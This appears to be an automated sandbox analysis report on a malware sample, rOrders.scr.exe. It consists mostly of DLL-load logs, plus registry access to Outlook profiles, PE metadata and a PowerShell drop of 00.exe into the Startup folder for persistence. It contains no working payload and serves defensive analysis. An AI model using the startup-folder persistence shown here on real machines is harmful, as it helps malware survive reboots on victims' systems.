Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\rOrders.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: rOrders.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: rOrders.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: rOrders.scr.exe

Static PE information: 0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]

Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_01155E17 push eax; iretd	0_2_01155E21
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_07A78620 push esp; retf	0_2_07A78621
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_07A78C98 pushfd ; iretd	0_2_07A78CA1
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 0_2_07A78C12 push eax; iretd	0_2_07A78C19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03775333 push edi; retf	2_2_03775342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03775323 push edi; retf	2_2_03775332
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03775318 push edi; retf	2_2_03775322
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_037752A0 push ebp; retf	2_2_037752CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03775153 push eax; retf	2_2_03775162
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03775143 push eax; retf	2_2_03775152
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03775138 push eax; retf	2_2_03775142
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4_2_02B524B9 push 8BFFFFFFh; retf	4_2_02B524BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_014B081C pushfd ; ret	9_2_014B081E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F2E78 push esp; iretd	9_2_069F2E79
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F6F8B push es; ret	9_2_069F6FE4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F6F13 push es; ret	9_2_069F6FE4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F7059 push es; iretd	9_2_069F705C

Source: rOrders.scr.exe	Static PE information: section name: .text entropy: 7.059154850937121
Source: 00.exe.2.dr	Static PE information: section name: .text entropy: 7.059154850937121

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to behavior

